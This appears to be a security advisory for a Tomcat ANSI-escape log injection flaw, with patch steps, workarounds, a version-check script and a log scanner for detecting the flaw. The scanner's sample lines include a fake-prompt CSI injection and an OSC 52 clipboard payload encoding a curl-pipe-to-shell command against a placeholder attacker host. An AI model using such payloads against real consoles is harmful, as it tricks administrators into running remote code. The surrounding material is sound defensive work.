CVE-2025-55754

9.6 CRITICAL

📋 TL;DR

Apache Tomcat does not escape ANSI escape sequences in log messages. When Tomcat's log output reaches a console that interprets such sequences, an attacker whose input ends up in a log message (for example a specially crafted request URL) can inject sequences that manipulate the console or the clipboard and trick an administrator into running attacker-controlled commands. Only Windows has been shown to be vulnerable; the attack is theoretically possible on other operating systems. Affects Tomcat 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.40 through 9.0.108, and the EOL 8.5.60 through 8.5.100.

💻 Affected Systems

Products:
  • Apache Tomcat
Versions: 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.40 through 9.0.108, plus EOL versions 8.5.60 through 8.5.100
Operating Systems: Windows (shown vulnerable); other platforms whose console interprets ANSI escape sequences are theoretically affected
Default Config Vulnerable: ⚠️ Yes
Notes: Only exploitable when Tomcat's log output is displayed in a console that interprets ANSI escape sequences and attacker-controlled input (such as a request URL) reaches a log message. The shipped conf/logging.properties includes java.util.logging.ConsoleHandler, so a Tomcat started from a terminal window is exposed.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator executes malicious command via clipboard manipulation or console spoofing, leading to full system compromise.

🟠

Likely Case

Limited impact: the injected sequences only matter while an administrator is viewing the live console output, and no public exploit is known; in most deployments this is a defense-in-depth issue.

🟢

If Mitigated

No impact if Tomcat's output never reaches an interactive console (service or systemd unit, file logging only) or the console does not interpret ANSI escape sequences.

🌐 Internet-Facing: LOW - The injection itself is an ordinary HTTP request, but impact requires an administrator watching the live console output and acting on what it shows or pastes; there is no direct remote code execution.
🏢 Internal Only: MEDIUM - Internal attackers who know an administrator runs Tomcat in a terminal can combine the injection with social engineering (a spoofed prompt or a clipboard payload).

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: NO
Unauthenticated Exploit: ✅ Yes for the injection step (the crafted request needs no credentials); completing the attack still requires the victim administrator to view the console output
Complexity: HIGH

No public exploit is known. Exploitation requires Tomcat output to reach a console that interprets escape sequences and an administrator to be looking at it; turning a spoofed console or a clipboard write into command execution depends on social engineering.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.0.11+, 10.1.45+, 9.0.109+

Vendor Advisory: https://lists.apache.org/thread/j7w54hqbkfcn0xb9xy0wnx8w5nymcbqd

Restart Required: Yes

Instructions:

1. Download the patched Tomcat release (11.0.11+, 10.1.45+ or 9.0.109+) from the Apache website.
2. Stop the Tomcat service.
3. Back up the configuration files (the conf/ directory).
4. Replace the Tomcat installation with the patched version.
5. Restore the configuration files.
6. Restart the Tomcat service.

🔧 Temporary Workarounds

Disable console ANSI support

Platform: all

Configure console/terminal to disable ANSI escape sequence interpretation

Windows: the legacy console host (conhost) interprets VT sequences only when enabled, so keep HKCU\Console\VirtualTerminalLevel unset or set to 0. This does not help with Windows Terminal, which interprets them unconditionally, so prefer the file-only logging workaround below.
Linux/macOS: TERM=dumb and stty -echoctl do not help. The terminal emulator interprets whatever is written to it regardless of TERM, and -echoctl only affects the echo of control characters you type. Do not tail raw logs in a terminal; view them through less without -R (which shows ESC as ^[) or cat -v.

Redirect logs away from console

Platform: all

Configure Tomcat to log to files only, with no console output:

Edit conf/logging.properties and remove java.util.logging.ConsoleHandler from both the 'handlers' and '.handlers' lists (the shipped default ends each list with that handler; keep the org.apache.juli.AsyncFileHandler entries, which write catalina.<date>.log and friends). Note that on Unix, catalina.sh start captures console output into catalina.out, so that file will no longer receive the JULI copy.
If the application uses log4j or logback, use file appenders only and drop any console appender.

🧯 If You Can't Patch

  • Run Tomcat as service without console access (Windows service/Linux systemd)
  • Implement strict access controls to Tomcat console/logs

🔍 How to Verify

Check if Vulnerable:

Check the Tomcat version with bin/catalina.sh version (or bin/version.sh), or read the 'Server version' line from the startup log

Check Version:

Linux: ./catalina.sh version | grep 'Server version'; Windows: catalina.bat version | findstr /C:"Server version" (without /C:, findstr treats the two words as separate search terms)

Verify Fix Applied:

Confirm version is 11.0.11+, 10.1.45+, or 9.0.109+ using version check command
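The version comparison above is easy to get wrong by hand because of the milestone builds (11.0.0-M1 sorts before 11.0.0) and the EOL 8.5 line that has no fixed release. The following is an added example for this page, not a script from the Apache Tomcat project: it parses the 'Server version' line printed by catalina.sh version and classifies it against the affected ranges listed in this advisory. The sample version strings in the demo are constructed.

```python
import re
import subprocess
import sys
from typing import NamedTuple, Optional

FINAL = 10**6  # milestone slot for GA builds: sorts after any -M<n> pre-release


class TomcatVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    milestone: int  # n for a "-Mn" pre-release, FINAL for a GA build


# Matches "Apache Tomcat/10.1.44" as printed by catalina.sh version, or a bare "11.0.0-M1".
_VERSION_RE = re.compile(r"(?:Apache Tomcat/)?(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?\b")


def parse_version(text: str) -> Optional[TomcatVersion]:
    """Extract the first Tomcat version from a line of text; None if there is none."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, milestone = m.groups()
    return TomcatVersion(int(major), int(minor), int(patch),
                         int(milestone) if milestone else FINAL)


# (first affected, first fixed) per release line, taken from the ranges in this advisory.
# first fixed = None: the 8.5 line is EOL and receives no fix.
AFFECTED_RANGES = [
    (TomcatVersion(11, 0, 0, 1), TomcatVersion(11, 0, 11, FINAL)),
    (TomcatVersion(10, 1, 0, 1), TomcatVersion(10, 1, 45, FINAL)),
    (TomcatVersion(9, 0, 40, FINAL), TomcatVersion(9, 0, 109, FINAL)),
    (TomcatVersion(8, 5, 60, FINAL), None),
]


def assess(text: str) -> str:
    """Classify a version line: vulnerable / fixed / not affected / vulnerable (EOL, no fix) / unknown."""
    v = parse_version(text)
    if v is None:
        return "unknown"
    for first_affected, first_fixed in AFFECTED_RANGES:
        if (v.major, v.minor) != (first_affected.major, first_affected.minor):
            continue
        if v < first_affected:
            return "not affected"  # predates the regression on this release line
        if first_fixed is None:
            return "vulnerable (EOL, no fix)"
        return "fixed" if v >= first_fixed else "vulnerable"
    return "unknown"  # release line not covered by this advisory


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python check_tomcat.py /opt/tomcat/bin/catalina.sh  (or catalina.bat)
        out = subprocess.run([sys.argv[1], "version"], capture_output=True, text=True).stdout
        lines = [l for l in out.splitlines() if l.startswith("Server version")]
    else:
        # Constructed sample lines for an offline demo
        lines = ["Server version: Apache Tomcat/10.1.44",
                 "Server version: Apache Tomcat/11.0.0-M1",
                 "Server version: Apache Tomcat/9.0.109",
                 "Server version: Apache Tomcat/8.5.100"]
    for line in lines:
        print(f"{line.strip()} -> {assess(line)}")
```

Feed it only the 'Server version' line; the same output also contains JVM and OS version strings that the loose pattern would otherwise pick up.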

📡 Detection & Monitoring

Log Indicators:

  • ANSI escape sequences in Tomcat logs: CSI sequences starting with ESC [ (cursor movement, screen clearing, colours) and OSC sequences starting with ESC ] (window title, and OSC 52 clipboard writes, which is how the clipboard manipulation described above would be carried)
  • Request URLs containing the ESC byte (0x1B), which in access logs usually appears still percent-encoded as %1B

Network Indicators:

  • Requests whose path or query carries ESC (raw 0x1B or percent-encoded %1B) can be flagged at a WAF or reverse proxy; beyond that there is no network-side signature, since the effect happens on the administrator's console

SIEM Query:

source="tomcat.logs" AND message MATCHES "\\x1b(\\[[0-9;?]*[@-~]|\\][^\\x07]*\\x07)|%1[bB]"

The pattern covers CSI sequences (ESC [), BEL-terminated OSC sequences (ESC ]), and the percent-encoded form seen in access logs; adjust the quoting to your SIEM's regex dialect.
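To show what the indicators above look like in practice and how a log viewer should neutralise them, here is an added example (not code from the page or from the Tomcat project) that scans constructed log lines for CSI and OSC escape sequences, URL-decodes access-log request lines so a percent-encoded %1B is caught too, labels OSC 52 clipboard writes separately, and caret-escapes control bytes so a hit can be printed to a terminal safely. The sample lines and the clipboard payload are constructed; the logger names are placeholders.

```python
import base64
import re
from urllib.parse import unquote

# Sequence shapes a terminal acts on (ECMA-48 / xterm):
#   ESC [ params intermediates final -> CSI: cursor movement, colours, clear screen
#   ESC ] ... BEL | ESC \             -> OSC: window title, hyperlinks, OSC 52 clipboard write
#   ESC <one byte 0x40-0x7E>          -> other single-byte escapes (e.g. ESC c = full reset)
ESCAPE_RE = re.compile(
    r"\x1b(?:\[[0-?]*[ -/]*[@-~]"
    r"|\][^\x07\x1b]*(?:\x07|\x1b\\)"
    r"|[@-~])"
)

# Constructed sample lines (not real Tomcat output); the payload and hosts are made up.
CLIPBOARD_PAYLOAD = base64.b64encode(b"curl http://attacker.invalid/x | sh").decode()
SAMPLE_LOG_LINES = [
    "12-Nov-2025 10:15:01.123 INFO [main] org.apache.catalina.startup.Catalina.start "
    "Server startup in [512] milliseconds",
    # CSI: clear the screen, move the cursor home, then paint a fake shell prompt
    "12-Nov-2025 10:15:07.456 INFO [http-nio-8080-exec-3] example.Logger.log "
    "request target [/\x1b[2J\x1b[Hadmin@host:~$ ] rejected",
    # OSC 52: put a command on the clipboard of whoever views this line in a terminal
    "12-Nov-2025 10:15:08.789 INFO [http-nio-8080-exec-4] example.Logger.log "
    "request target [/\x1b]52;c;" + CLIPBOARD_PAYLOAD + "\x07] rejected",
    # Access-log request line: the same CSI bytes, still percent-encoded as received
    '10.0.0.5 - - [12/Nov/2025:10:15:08 +0000] "GET /%1B%5B2J%1B%5BH HTTP/1.1" 400 -',
]


def find_escape_sequences(line):
    """All escape sequences in a line, after URL-decoding so %1B is caught as well."""
    return ESCAPE_RE.findall(unquote(line))


def classify(seq):
    """Label one matched sequence by what a terminal would do with it."""
    if seq.startswith("\x1b]52;"):
        return "OSC-52 clipboard write"
    if seq.startswith("\x1b]"):
        return "OSC"
    if seq.startswith("\x1b["):
        return "CSI"
    return "ESC"


def sanitize(text):
    """Caret-escape C0 control bytes (ESC -> ^[, BEL -> ^G), like cat -v, so the
    text can be displayed in a terminal without being interpreted."""
    return re.sub(r"[\x00-\x08\x0b-\x1f\x7f]",
                  lambda m: "^" + chr((ord(m.group(0)) + 0x40) & 0x7F), text)


def scan(lines):
    """Return (line_number, safe_display_form, [labels]) for every line carrying escapes."""
    hits = []
    for n, line in enumerate(lines, start=1):
        seqs = find_escape_sequences(line)
        if seqs:
            hits.append((n, sanitize(unquote(line)), [classify(s) for s in seqs]))
    return hits


if __name__ == "__main__":
    for n, shown, labels in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {', '.join(labels)}\n    {shown}")
```

Anything that displays Tomcat logs to an operator (a tail wrapper, a dashboard, a chat-ops bot) should apply the same caret-escaping before output; the detection side should run on the URL-decoded form, otherwise the access-log variant is missed.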

🔗 References
